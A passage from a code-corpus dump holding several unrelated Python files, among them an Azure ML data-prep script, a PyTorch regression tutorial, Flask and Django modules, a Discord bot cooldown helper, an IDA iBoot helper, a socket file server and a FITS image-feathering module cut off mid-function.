'train_test_data')\n ],\n validate=False\n )\n train_test_data.register(\n workspace=ws,\n name=training_testing_dataset_name,\n description=\"A part of the components that have been processed and split in training and testing sets for an AI model.\",\n create_new_version=True\n )\n \n\ndef processGeneratedData(generator_folder):\n all_generated_images = []\n all_generated_sizes = []\n all_generated_labels = []\n for img in sorted(glob(f\"{generator_folder}/*.png\")):\n size_name = img.replace('.png', '--size.json')\n all_generated_images.append(plt.imread(img)[:,:,:3] / 255)\n all_generated_labels.append(img.split('-')[-3].split('/')[-1]) # Get the Object name (data/tveer/generator/Object 1-0-1.png --> Object 1)\n with open(size_name, 'r') as f:\n all_generated_sizes.append(json.load(f))\n\n X_train_conv_generated = np.asarray(all_generated_images)\n X_train_values_generated = np.asarray(all_generated_sizes)\n all_generated_labels = np.asarray(all_generated_labels)\n\n label_encoder = LabelEncoder()\n integer_encoded = label_encoder.fit_transform(all_generated_labels)\n\n # binary encode\n onehot_encoder = OneHotEncoder(sparse=False)\n integer_encoded = integer_encoded.reshape(len(integer_encoded), 1)\n y_train_generated = onehot_encoder.fit_transform(integer_encoded)\n return y_train_generated, X_train_values_generated, X_train_conv_generated\n\ndef generateData(datastore, ws, generator_dataset_name, generator_folder, components, X_train_conv, X_train_values, y_train):\n train_generator = ImageDataGenerator(rotation_range=360)\n time_to_repeat_generator = 5\n image_generator = train_generator.flow(\n [\n np.repeat(X_train_conv, time_to_repeat_generator, 0),\n np.repeat(X_train_values, time_to_repeat_generator, 0)\n ],\n np.repeat(y_train, time_to_repeat_generator, 0),\n batch_size = 32\n )\n\n for i in range(20):\n generated_data, generated_labels = image_generator.next()\n for j in range(generated_data[1].shape[0]):\n plt.imsave(f\"{generator_folder}/{components[np.argmax(generated_labels[j])]}-{i}-{j}.png\", generated_data[0][j])\n with open(f\"{generator_folder}/{components[np.argmax(generated_labels[j])]}-{i}-{j}--size.json\", \"w\") as f:\n json.dump(generated_data[1][j], f)\n\n datastore.upload(src_dir=generator_folder, target_path='generator_data')\n generator_data = Dataset.File.from_files(\n [\n (datastore, 'generator_data')\n ],\n validate=False\n )\n generator_data.register(\n workspace=ws,\n name=generator_dataset_name,\n description=\"Components of the 't Veer dataset which have been generated and slightly augmented with rotations.\",\n create_new_version=True\n )\n\ndef saveNumpyArrays(folder, **arrays):\n for array_name, array in arrays.items():\n np.save(f\"{folder}/{array_name}.npy\", array)\n\n\ndef trainTestSplit(all_labels_np, all_components_np, all_sizes_np):\n label_encoder = LabelEncoder()\n integer_encoded = label_encoder.fit_transform(sorted(all_labels_np))\n\n # binary encode\n onehot_encoder = OneHotEncoder(sparse=False)\n integer_encoded = integer_encoded.reshape(len(integer_encoded), 1)\n onehot_encoded = onehot_encoder.fit_transform(integer_encoded)\n\n training_indices = []\n test_indices = []\n for obj in range(0, onehot_encoded.shape[1]):\n obj_indices = np.where(onehot_encoded[:,obj] == 1)[0]\n np.random.shuffle(obj_indices)\n training_samples = math.floor(0.7 * len(obj_indices)) ## Take 70 % training samples.\n training_indices.extend(obj_indices[:training_samples])\n test_indices.extend(obj_indices[training_samples:])\n\n # print(f\"{len(training_indices)} training indices\")\n # print(f\"{len(test_indices)} test indices\")\n\n X_train_conv = all_components_np[training_indices]\n X_train_values = all_sizes_np[training_indices]\n X_test_conv = all_components_np[test_indices]\n X_test_values = all_sizes_np[test_indices]\n\n y_train = onehot_encoded[training_indices]\n y_test = onehot_encoded[test_indices]\n return X_train_conv, X_train_values, X_test_conv, X_test_values, y_train, y_test\n\n\ndef loadInputData(input_dataset_name, ws):\n input_dataset = Dataset.get_by_name(workspace=ws, name=input_dataset_name)\n \n temp_directory = os.path.join(os.environ.get('ROOT_DIR'), f'data/tmp/{input_dataset_name}')\n os.makedirs(temp_directory, exist_ok=True)\n \n moount_context = input_dataset.mount(temp_directory)\n moount_context.start()\n\n components = os.listdir(temp_directory)\n\n all_components = []\n all_labels = []\n all_sizes = []\n for comp in components:\n for img_uri in glob(os.path.join(temp_directory, comp) + \"/*.png\"):\n try:\n size = img_uri.split(\".png\")[-2]\n with open(size + '--size.json', \"r\") as f:\n all_sizes.append(json.load(f))\n img = plt.imread(img_uri)[:,:,:3]\n all_components.append(img)\n all_labels.append(comp)\n except FileNotFoundError:\n pass\n\n all_labels_np = np.array(all_labels)\n all_components_np = np.array(all_components)\n all_sizes_np = np.array(all_sizes)\n\n return all_labels_np, all_components_np, all_sizes_np, components\n\nif __name__ == '__main__':\n main()\n","sub_path":"steps/01_DataPreparing.py","file_name":"01_DataPreparing.py","file_ext":"py","file_size_in_byte":8217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"389832879","text":"\"\"\"\nhttps://towardsdatascience.com/linear-regression-with-pytorch-eb6dedead817\n\"\"\"\n\nimport numpy as np\nimport torch\nfrom torch.autograd import Variable\nimport matplotlib.pyplot as plt\nimport scipy.stats as stats\n\n############################\n## Define hyperparameters ##\n############################\n\n# Training hyperparameters\nlearningRate = 0.01\nepochs = 1000\n\n#####################\n## Create data set ##\n#####################\n\nN = 11\n\nx_values = [i for i in range(N)]\nx_train = np.array(x_values, dtype=np.float32) # (11,)\nx_train = x_train.reshape(-1, 1) # (11,1)\n\ny_values = [2*i + 1 for i in x_values]\ny_train = np.array(y_values, dtype=np.float32)\ny_train = y_train.reshape(-1, 1)\n\n\n###########\n## Model ##\n###########\n\nclass linearRegression(torch.nn.Module):\n def __init__(self, inputDim, outputDim):\n super(linearRegression, self).__init__()\n self.linear = torch.nn.Linear(inputDim, outputDim)\n\n def forward(self, x):\n out = self.linear(x)\n return out\n\n# Initialise the model\nmodel = linearRegression(inputDim=1, outputDim=1)\n\n###############\n## Inference ##\n###############\n\n# Mean Squared Error as loss function\ncriterion = torch.nn.MSELoss() \n\n# Stochastic gradient descent\noptimizer = torch.optim.SGD(model.parameters(), lr=learningRate)\n\nfor epoch in range(epochs):\n inputs = Variable(torch.from_numpy(x_train)) # no minibatches\n labels = Variable(torch.from_numpy(y_train))\n\n # Clear gradient buffers at each epoch\n optimizer.zero_grad()\n\n # get output from the model, given the inputs\n outputs = model(inputs)\n\n # get loss for the predicted output\n loss = criterion(outputs, labels)\n print(loss)\n\n # get gradients w.r.t to parameters\n loss.backward()\n\n # update parameters\n optimizer.step()\n\n print('epoch {}, loss {}'.format(epoch, loss.item()))\n\n#################################################\n## Compare to linear regression fit with scipy ##\n#################################################\n\n# Extract weights from the NN model\nparams_nn = list(model.parameters())\nparams_nn = [ x.data.numpy().round(2) for x in params_nn ]\nprint(\"\\nNN parameters:\")\nprint(params_nn)\n\nparams_lr = stats.linregress(x_train[:,0], y_train[:,0])[:2]\nprint(\"\\nLR parameters:\")\nprint(params_lr)\n\n##########\n## Plot ##\n##########\n\n# with torch.no_grad(): # we don't need gradients in the testing phase\n# predicted = model(Variable(torch.from_numpy(x_train))).data.numpy()\n\n# plt.clf()\n# plt.plot(x_train, y_train, 'go', label='True data', alpha=0.5)\n# plt.plot(x_train, predicted, '--', label='Predictions', alpha=0.5)\n# plt.legend(loc='best')\n# plt.show()\n\n","sub_path":"linear_regression/linear_regression.py","file_name":"linear_regression.py","file_ext":"py","file_size_in_byte":2654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"616737728","text":"import json\nfrom flask import Blueprint, render_template, jsonify, request, current_app\nfrom flask_login import current_user\n\nimport db\nfrom utils import database\n\n\nbp = Blueprint(\"home\", __name__)\n\n\n@bp.route(\"/\", methods=[\"GET\"])\ndef home():\n \"\"\"\n Render home page\n\n \"\"\"\n try:\n with open(current_app.config[\"THEME_DIR\"], \"r\") as f:\n data = json.load(f)\n formatted_font = data[\"font_family\"].replace(\" \", \"+\")\n return render_template(\"index.html\", icon=data[\"icon\"], formated_font=formatted_font,\n font_family=data[\"font_family\"], name_font_family=data[\"name_font_family\"])\n except FileNotFoundError as e:\n return jsonify({\"ERROR\": e})\n\n\n@bp.route(\"/theme\", methods=[\"GET\"])\ndef theme():\n \"\"\"\n Returns theme JSON object\n\n Returns (JSON): theme JSON object\n \"\"\"\n try:\n with open(current_app.config[\"THEME_DIR\"], \"r\") as f:\n data = json.load(f)\n return jsonify({\"theme\": data})\n except FileNotFoundError as e:\n return jsonify({\"ERROR\": e})\n\n\n@bp.route(\"/top_k\", methods=[\"GET\"])\ndef top_k():\n \"\"\"\n Returns the top k latest entries in the database\n\n Returns (JSON): a list of top k entries\n\n \"\"\"\n db_conn = db.get_db()\n k = request.args.get(\"k\")\n top_ks = database.get_top_k_entries(db_conn, int(k))\n db_conn.close()\n return jsonify({\"top_k\": top_ks})\n\n\n@bp.route(\"/public_repos\", methods=[\"GET\"])\ndef public_repos():\n \"\"\"\n List all public repos from github\n\n Returns (JSON): a list of repos and updated timestamp\n\n \"\"\"\n db_conn = db.get_db()\n if request.method == \"GET\":\n repos, updated = database.get_public_repos(db_conn)\n db_conn.close()\n return jsonify({\"repos\": repos, \"updated\": updated})\n\n\n@bp.route(\"/blogs\", methods=[\"GET\", \"POST\"])\ndef blogs():\n \"\"\"\n GET or POST blogs\n\n Returns (JSON): GET -> a list of all blogs\n POST -> INFO message\n\n \"\"\"\n db_conn = db.get_db()\n if request.method == \"GET\":\n all_blogs, updated = database.get_articles(db_conn)\n db_conn.close()\n return jsonify({\"blogs\": all_blogs, \"updated\": updated})\n if current_user.is_authenticated:\n title = request.json[\"title\"]\n description = request.json[\"description\"]\n url = request.json[\"url\"]\n image_url = request.json[\"image_url\"]\n time_stamp = request.json[\"time_stamp\"] + \" 00:00:00\"\n database.add_entry(\"blogs\", db_conn, title, description, url, image_url, time_stamp)\n db_conn.close()\n return jsonify({\"INFO\": \"Blog added\"})\n return jsonify({\"ERROR\": \"Unauthenticated\"})\n\n\n@bp.route(\"/publications\", methods=[\"GET\", \"POST\"])\ndef publications():\n \"\"\"\n GET or POST publications\n\n Returns (JSON): GET -> a list of all publications\n POST -> INFO message\n\n \"\"\"\n db_conn = db.get_db()\n if request.method == \"GET\":\n all_blogs = database.get_entries(\"publications\", db_conn)\n db_conn.close()\n return jsonify({\"publications\": all_blogs})\n if current_user.is_authenticated:\n title = request.json[\"title\"]\n description = request.json[\"description\"]\n url = request.json[\"url\"]\n image_url = request.json[\"image_url\"]\n time_stamp = request.json[\"time_stamp\"] + \" 00:00:00\"\n database.add_entry(\"publications\", db_conn, title, description, url, image_url, time_stamp)\n db_conn.close()\n return jsonify({\"INFO\": \"Publication added\"})\n return jsonify({\"ERROR\": \"Unauthenticated\"})\n","sub_path":"home.py","file_name":"home.py","file_ext":"py","file_size_in_byte":3595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"411488003","text":"from .sync import Event\n\n__all__ = ['Promise']\n\n\nclass Promise:\n def __init__(self):\n self._event = Event()\n self._data = None\n self._exception = None\n\n def __repr__(self):\n res = super().__repr__()\n if self.is_set():\n extra = repr(self._exception) if self._exception else repr(self._data)\n else:\n extra = 'unset'\n return '<{} [{}]>'.format(res[1:-1], extra)\n\n def is_set(self):\n '''Return `True` if the promise is set'''\n return self._event.is_set()\n\n def clear(self):\n '''Clear the promise'''\n self._data = None\n self._exception = None\n self._event.clear()\n\n async def set(self, data):\n '''Set the promise. Wake all waiting tasks (if any).'''\n self._data = data\n await self._event.set()\n\n async def get(self):\n '''Wait for the promise to be set, and return the data.\n\n If an exception was set, it will be raised.'''\n await self._event.wait()\n\n if self._exception is not None:\n raise self._exception\n\n return self._data\n\n async def __aenter__(self):\n return self\n\n async def __aexit__(self, exc_type, exc, tb):\n if exc_type is not None:\n self._exception = exc\n await self._event.set()\n\n return True\n","sub_path":"curio/promise.py","file_name":"promise.py","file_ext":"py","file_size_in_byte":1351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"608184047","text":"from rest_framework.serializers import ModelSerializer\nfrom .models import (Location,\n weather_data\n )\n\nclass LocationSerializer(ModelSerializer):\n class Meta:\n model = Location\n fields = '__all__'\n\nclass WeatherDataSerializer(ModelSerializer):\n location = LocationSerializer(required=True)\n\n class Meta:\n model = weather_data\n fields = '__all__'\n\n def create(self, validated_data):\n loc_data = validated_data.pop('location', None)\n location = Location.objects.create(**loc_data)\n validated_data.update({\"temperature\":\"[\"+validated_data[\"temperature\"]+\"]\"})\n return weather_data.objects.create(location=location, **validated_data)\n\n\n def update(self, instance, validated_data):\n loc_dict = validated_data.pop('location', None)\n if loc_dict:\n loc_obj = instance.location\n for key, value in loc_dict.iteritems():\n setattr(loc_obj, key, value)\n loc_obj.save()\n validated_data[\"location\"] = loc_obj\n for key, value in validated_data.iteritems():\n setattr(instance, key, value)\n instance.save()\n return instance","sub_path":"Weather_API/src/weather_API/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"212569763","text":"# @Time : 2019/5/28 16:33\n# @Author : Xu Huipeng\n# @Blog : https://brycexxx.github.io/\n\nfrom typing import List\n\n\nclass Solution:\n def sortColors(self, nums: List[int]) -> None:\n \"\"\"\n Do not return anything, modify nums in-place instead.\n \"\"\"\n cnt_zero = cnt_one = cnt_two = 0\n for num in nums:\n if num == 0:\n cnt_zero += 1\n elif num == 1:\n cnt_one += 1\n else:\n cnt_two += 1\n nums[:cnt_zero] = [0] * cnt_zero\n nums[cnt_zero:cnt_zero + cnt_one] = [1] * cnt_one\n nums[cnt_zero + cnt_one:] = [2] * cnt_two\n\n def sortColors1(self, nums: List[int]) -> None:\n j = 0\n for i in range(len(nums)):\n if nums[i] < 2:\n nums[i], nums[j] = nums[j], nums[i]\n j += 1\n k = 0\n for i in range(j):\n if nums[i] < 1:\n nums[i], nums[k] = nums[k], nums[i]\n k += 1\n\n def sortColors2(self, nums: List[int]) -> None:\n cur, low, high = 0, 0, len(nums) - 1\n while cur <= high:\n if nums[cur] == 0:\n nums[cur], nums[low] = nums[low], nums[cur]\n low += 1\n cur += 1\n elif nums[cur] == 2:\n nums[cur], nums[high] = nums[high], nums[cur]\n high -= 1\n else:\n cur += 1\n\n\nif __name__ == '__main__':\n s = Solution()\n nums = [2, 0, 2, 1, 1, 0, 2]\n print(s.sortColors2(nums))\n print(nums)\n","sub_path":"sortColors.py","file_name":"sortColors.py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"20426896","text":"from django import forms\n\n\nclass PreguntaCinco(forms.Form):\n RESPUESTA_PREGUNTA_CINCO = (\n ('a', 'a. 10.000'),\n ('b', 'b. 7.600'),\n ('c', 'c. 2.500'),\n ('d', 'd. 8.000'),\n )\n\n respuesta = forms.TypedChoiceField(\n # label='preubas',\n choices=RESPUESTA_PREGUNTA_CINCO,\n widget=forms.RadioSelect(attrs={\n 'class': 'custom-control-indicator',\n\n })\n )\n fecha_registro_P05 = forms.DateTimeField","sub_path":"isomaticAppWeb/preguntaCinco.py","file_name":"preguntaCinco.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"526146732","text":"import re\n\nclass ParamCreator(object):\n\t'''\n\tResponsible for creating new parameter files for candidates.\n\t'''\n\tdef __init__(self, referenceFile):\n\t\t'''\n\t\tSets up the creator with:\n\t\t\t- The reference file on which all candidates are based.\n\t\t'''\n\n\t\t# regex for finding the parameter values in XML.\n\t\tself.replacePat = re.compile(r'(<.*>)[0-9]+(<.*>)')\n\t\t\n\t\t# open and read the reference file, storing its lines for fast manipulation later.\n\t\twith open(referenceFile, 'r') as f:\n\t\t\tself.referenceLines = f.readlines()\n\n\tdef createNew(self, candidate, newFile):\n\t\t'''\n\t\tCreates a new parameter file using the reference file specified when the object was created\n\t\tand values from the given candidate.\n\t\t'''\n\t\t\n\t\t# copy the reference list.\n\t\tcandLines = list(self.referenceLines)\n\t\t\n\t\t# loop over the relevant lines in the file and replace the value in each line\n\t\t# with that from the candidate.\n\t\tcandIndex = 0\n\t\tfor i in xrange(21, 29): # the lines which contain the cell values we're interested in.\n\t\t\tcandLines[i] = re.sub(\n\t\t\t\tself.replacePat, # the pattern to look for.\n\t\t\t\tr'\\g<1>%s\\g<2>' % str(candidate[candIndex]), # what to replace it with once we find it.\n\t\t\t\tcandLines[i]) # the line to look for it in.\n\t\t\t\n\t\t\t# now looking at the next element of the candidate.\n\t\t\tcandIndex += 1\n\t\t\n\t\t# write out the new lines to a new parameter file.\n\t\twith open(newFile, 'w') as f:\n\t\t\tf.writelines(candLines)\n\t\t","sub_path":"py/eae_params.py","file_name":"eae_params.py","file_ext":"py","file_size_in_byte":1408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"365603273","text":"from Utils.CurrencyUtils import CurrencyGuild, CurrencyMessage\nfrom discord import Guild as DGuild\nfrom time import time as epoch\n\n\nclass CurrencyCommand:\n\t\n\tconversion = {\n\t\t\"y\": 31449600, # year to second multiplier,\n\t\t# defined as 52 weeks\n\t\t\"w\": 604800, # week to second multiplier\n\t\t\"d\": 86400, # day to second multiplier\n\t\t\"h\": 3600, # hour to second multiplier\n\t\t\"m\": 60, # minute to second multiplier\n\t\t\"s\": 1\n\t}\n\t\n\tdef __init__(self, client):\n\t\tself.client = client\n\t\t\n\tdef new_guild(self, guild):\n\t\tif isinstance(guild, DGuild):\n\t\t\treturn CurrencyGuild(self.client, guild)\n\t\t\n\t\tg = self.client.get_guild(guild)\n\t\n\t\tif g:\n\t\t\treturn CurrencyGuild(self.client, g)\n\t\n\tasync def run(self, cmd, message, *args):\n\t\tmessage = CurrencyMessage(self.client, message)\n\n\t\tawait self.currency_run(cmd, message, *args)\n\t\n\tasync def currency_run(self, *args):\n\t\tpass\n\t\n\tdef time_formatter(self, time):\n\t\tif isinstance(time, float):\n\t\t\ttime = time.__round__()\n\t\t\n\t\ttimes = [\"year\", \"week\", \"day\", \"hour\", \"minute\", \"second\"]\n\t\ttime_string = \"\"\n\t\tfor t in times:\n\t\t\tmultiplier = self.conversion[t[0]]\n\t\t\tcurrent_time = time // multiplier\n\t\t\ttime = time % multiplier\n\t\t\t\n\t\t\tif current_time > 0:\n\t\t\t\tplural = \"s \" if current_time > 1 else \" \"\n\t\t\t\ttime_string += str(current_time) + \" \"\n\t\t\t\ttime_string += t + plural\n\t\t\n\t\treturn time_string.strip()\n\n\ndef gambling_suspended(f):\n\tasync def arg_handler(self, cmd, message, *args):\n\t\tif message.author.is_gambling_suspended:\n\t\t\tawait self.client.errors.GamblingSuspended().send(\n\t\t\t\tmessage.channel\n\t\t\t)\n\t\t\treturn\n\t\treturn await f(self, cmd, message, *args)\n\treturn arg_handler\n\n\ndef command_cooldown(name):\n\tdef decorator(f):\n\t\tasync def arg_handler(self, cmd, message, *args):\n\t\t\tin_cooldown = (\n\t\t\t\tself.client\n\t\t\t\t.cooldown_manager\n\t\t\t\t.in_cooldown(\n\t\t\t\t\tname,\n\t\t\t\t\t(message.author.id, message.guild.id,)\n\t\t\t\t)\n\t\t\t)\n\t\t\t\n\t\t\tif in_cooldown:\n\t\t\t\treturn await self.client.errors.InCooldown(\n\t\t\t\t\tself.time_formatter(\n\t\t\t\t\t\tself.client.cooldown_manager.get_cooldown(\n\t\t\t\t\t\t\tname,\n\t\t\t\t\t\t\t(message.author.id, message.guild.id,),\n\t\t\t\t\t\t)\n\t\t\t\t\t)\n\t\t\t\t).send(message.channel)\n\t\t\t\n\t\t\tself.client.cooldown_manager.add(\n\t\t\t\tname,\n\t\t\t\t(message.author.id, message.guild.id,),\n\t\t\t\tgetattr(self, \"cooldown\", 0) + epoch()\n\t\t\t)\n\t\t\t\n\t\t\treturn await f(self, cmd, message, *args)\n\t\treturn arg_handler\n\treturn decorator\n","sub_path":"Utils/CurrencyCommand.py","file_name":"CurrencyCommand.py","file_ext":"py","file_size_in_byte":2341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"386989856","text":"from ida_search import *\nfrom idautils import *\nfrom idc import *\n\nSROM = 0\nIBOT = 1\nSEP = 2\n\nsegmbitness = None\nfiletype = None\nbuildtype = None\nibootversion = None\nissep = None\n\n\ndef bad(ea):\n return ea == BADADDR\n\n\ndef is64(segm):\n return segm.bitness == 2\n\n\ndef find_probable_string_start(segm):\n # The initial run of this function is before any analysis or segmentation starts.\n #\n # functions = list(Functions())\n\n prologue = \"6E 6F 72 30 00\"\n\n # if string_addr < functions[len(functions)-1]:\n if filetype == SROM:\n prologue = \"6E 6F 72 30 00\"\n\n string_addr = find_binary(segm.end_ea, segm.start_ea, prologue, 16, SEARCH_UP)\n\n return string_addr\n","sub_path":"iBootStrap/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"44547620","text":"import socket # Import socket module\nimport select\n\n\nport = 60004 # Reserve a port for your service.\nconnexion_principale = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Create a socket object\nhost = input(\"Quel est ton ip?\")\t\t\t\t # Get local machine name\nconnexion_principale.bind((host, port)) # Bind to the port\nconnexion_principale.listen(5) # Now wait for client connection.\n\n\nprint('Server listening....')\nconnexion_avec_client, infos_connexion = connexion_principale.accept() # Establish connection with client.\nprint('Got connection from', infos_connexion)\nfilename=input('chemin du fichier : ') #Select the right fie\nmsg_send2 = \"Envoi du fichier\"\nconnexion_avec_client.send(msg_send2.encode())\nmsg_received2 = connexion_avec_client.recv(1024) #Wait for opened file on client file\nmsg_received2 = msg_received2.decode()\nif msg_received2 == \"file opened\":\n\tmsg_send3 = \"Go\" #Send the file \n\tconnexion_avec_client.send(msg_send3.encode())\n\tf = open(filename,'rb') #Open the file in reading mode\n\tl = f.read(1024)\n\twhile (l):\n\t\tconnexion_avec_client.send(l)\n\t\tprint('Sent ',repr(l))\n\t\tl = f.read(1024)\n\tmsg_received3 = connexion_avec_client.recv(1024) #Wait for the file to be successfully received\n\tmsg_received3 = msg_received3.decode()\n\tprint (msg_received3)\n\tf.close() #close the file \n\tprint('Done sending')\n\tconnexion_avec_client.close()#close the connection\n\tFalse\n\n\n\n","sub_path":"old/server_file.py","file_name":"server_file.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"354072352","text":"import sys\nN = int(sys.stdin.readline())\nstack = []\nstack_len = 0\n\nwhile N > 0:\n Input = sys.stdin.readline()\n N -= 1\n\n if 'push' in Input:\n stack_len += 1\n stack += [int(Input[5:])]\n\n elif 'pop' in Input:\n if stack:\n print(stack[-1])\n stack.pop()\n stack_len -= 1\n else:\n print(-1)\n\n elif 'size' in Input:\n print(stack_len)\n\n elif 'empty' in Input:\n if stack:\n print(0)\n else:\n print(1)\n\n else:\n if stack:\n print(stack[-1])\n else:\n print(-1)","sub_path":"A/S/200309/BJ10828스택_s.py","file_name":"BJ10828스택_s.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"600308365","text":"import os\nimport image_registration\nfrom image_registration.fft_tools.zoom import zoom_on_pixel\nfrom FITS_tools.cube_regrid import regrid_fits_cube,regrid_cube_hdu\nfrom FITS_tools.hcongrid import hcongrid,hcongrid_hdu\nimport FITS_tools\nimport fft_psd_tools\nimport spectral_cube.io.fits\nfrom astropy import wcs\nfrom astropy.io import fits\nfrom astropy import coordinates\nfrom astropy import units as u\nfrom astropy import log\nfrom astropy.utils.console import ProgressBar\nfrom itertools import izip\nimport numpy as np\n\ndef file_in(filename, extnum=0):\n \"\"\"\n Take the input files. If input is already HDU, then return it.\n If input is a .fits filename, then read the .fits file. \n\n Return\n ----------\n hdu : obj \n An object containing both the image and the header\n im : (float point?) array\n The image array\n header : header object\n The header of the input .fits file\n\n Parameters\n ----------\n filename : str\n The input .fits filename or a HDU variable name\n extnum : int\n The extension number to use from the input .fits file\n \"\"\"\n if isinstance(filename, (fits.ImageHDU, fits.PrimaryHDU) ):\n hdu = filename\n else:\n hdu = fits.open(filename)[extnum]\n \n im = hdu.data.squeeze()\n header = FITS_tools.strip_headers.flatten_header(hdu.header)\n\n return hdu, im, header\n\n\n\ndef flux_unit(image, header):\n \"\"\"\n Convert all possible units to un-ambiguous unit like Jy/pixel or Jy/arcsec^2.\n\n Parameter/Return\n ----------------\n image : (float point?) array\n The input image with arbitrary flux unit (e.g. Jy/beam). \n Get converted to Jy/arcsec^2 units in output.\n header : header object \n Header of the input/output image\n \"\"\"\n\n return image, header\n\n\n\ndef regrid(hd1,im1,im2raw,hd2):\n \"\"\"\n Regrid the low resolution image to have the same dimension and pixel size with the\n high resolution image.\n\n Return\n ----------\n hdu2 : An object containing both the image and the header\n This will containt the regridded low resolution image, and the image header taken\n from the high resolution observation.\n im2 : (float point?) array\n The image array which stores the regridded low resolution image.\n nax1, nax2 : int(s)\n Number of pixels in each of the spatial axes.\n pixscale : float (?)\n pixel size in the input high resolution image.\n\n Parameters\n ----------\n hd1 : header object\n The header of the high resolution image\n im1 : (float point?) array\n The high resolution image\n im2raw : (float point?) array\n The pre-regridded low resolution image\n hd2 : header object \n header of the low resolution image\n \"\"\"\n\n # Sanity Checks:\n assert hd2['NAXIS'] == im2raw.ndim == 2, 'Error: Input lores image dimension non-equal to 2.'\n assert hd1['NAXIS'] == im1.ndim == 2, 'Error: Input hires image dimension non-equal to 2.'\n\n # read pixel scale from the header of high resolution image\n pixscale = FITS_tools.header_tools.header_to_platescale(hd1)\n log.debug('pixscale = {0}'.format(pixscale))\n\n # read the image array size from the high resolution image\n nax1,nax2 = (hd1['NAXIS1'],\n hd1['NAXIS2'],\n )\n\n # create a new HDU object to store the regridded image\n hdu2 = fits.PrimaryHDU(data=im2raw, header=hd2)\n\n # regrid the image\n hdu2 = hcongrid_hdu(hdu2, hd1)\n im2 = hdu2.data.squeeze()\n\n # return variables\n return hdu2, im2, nax1, nax2, pixscale\n\n\n\ndef pbcorr(fft2, hd1, hd2):\n \"\"\"\n Divide the fourier transformed low resolution image with its fourier transformed primary\n beam, and then times the fourier transformed primary beam of the high resolution image.\n\n Parameters\n ----------\n fft2 : float array \n Fourier transformed low resolution image\n hd1 : header object\n Header of the high resolution image\n hd2 : header object\n Header of the low resolution image \n \n Return\n ---------- \n fft2 : float array\n Fourier transformed low resolution image, after corrected for the primary beam effect\n \"\"\"\n\n return fft2\n\n\n\ndef flux_match(fft1, fft2):\n \"\"\"\n Scale the flux level of the high resolution image, based on the flux level of the low\n resolution image. This is because we probably trust the flux scale from the space better,\n given that is it not affected by the atmospheric effects and the related calibrations. \n This also maintain a consistency if we want to incorporate more bands from the space \n observatory for science analysis.\n\n Parameters\n ----------\n fft1 : float array \n Fourier transformed high resolution image\n fft2 : float array \n Fourier transformed low resolution image\n\n Return\n -----------\n fft1 : float array \n Fourier transformed low resolution image after flux rescaling.\n \"\"\"\n\n return fft1\n\n\n\ndef feather_kernel(nax2, nax1, lowresfwhm, pixscale):\n \"\"\"\n Construct the weight kernels (image arrays) for the fourier transformed low resolution and\n high resolution images. This routine follow the \"feather algorithm\", e.g.:\n \n (***To be detailed.) \n \n Return\n ----------\n kernel : float array\n An image array containing the weighting for the low resolution image\n kernel1 : float array\n An image array containing the weighting for the high resolution image\n\n Parameters\n ----------\n nax2, nax1 : int\n Number of pixels in each axes. \n lowresfwhm : float\n Angular resolution of the low resolution image (FWHM) \n pixscale : float (?)\n pixel size in the input high resolution image.\n \"\"\"\n # Construct arrays which hold the x and y coordinates (in unit of pixels)\n # of the image\n ygrid,xgrid = (np.indices([nax2,nax1])-np.array([(nax2-1.)/2,(nax1-1.)/2.])[:,None,None])\n\n fwhm = np.sqrt(8*np.log(2))\n # sigma in pixels\n sigma = ((lowresfwhm/fwhm/(pixscale*u.deg)).decompose().value)\n log.debug('sigma = {0}'.format(sigma))\n\n kernel = np.fft.fftshift( np.exp(-(xgrid**2+ygrid**2)/(2*sigma**2)) )\n kernel/=kernel.max()\n kernel1 = 1 - kernel\n\n return kernel,kernel1\n\n\n\ndef fftmerge(kernel1,kernel2,fft1,fft2):\n \"\"\"\n Combine images in the fourier domain, and then output the combined image\n both in fourier domain and the image domain.\n\n Parameters\n ----------\n kernel1,2 : float array\n Weighting images.\n fft1,fft2: float array\n Fourier transformed input images.\n\n Return\n ----------\n fftsum : float array\n Combined image in fourier domain.\n combo : float array\n Combined image in image domain.\n \"\"\"\n\n # Sanity check in case that the two input images does not overlap well\n # in the uv-distance range.\n\n # Combine and inverse fourier transform the images\n fftsum = kernel2*fft2 + kernel1*fft1\n combo = np.fft.ifft2(fftsum)\n\n return fftsum, combo\n\n\n\ndef smoothing(combo, targres):\n \"\"\"\n Smooth the image to the targeted final angular resolution.\n\n Parameters\n ----------\n combo : float array\n Combined image\n targres : float\n The HPBW of the smoothed image (in units of arcsecond)\n \"\"\"\n\n return combo\n\n\n\ndef akb_plot(fft1, fft2, fftsum, outname=\"akb_combine.pdf\"):\n \"\"\"\n Generate plots for examining the combined results in fourier domain.\n\n Parameters\n ----------\n fft1 : float array\n Fourier transformed high resolution image\n fft2 : float array\n Fourier transformed low resolution image\n fftsum : float array\n Fourier transformed combined image\n \"\"\"\n return\n\n\ndef casaheader(header):\n \"\"\"\n Generate the header which is compatible with CASA.\n\n Parameters\n ----------\n header : header object\n The header of the high resolution image.\n\n Return\n combo_header : header object\n The generated CASA compatible header\n \"\"\"\n combo_header = header\n return combo_header\n\n\n\ndef 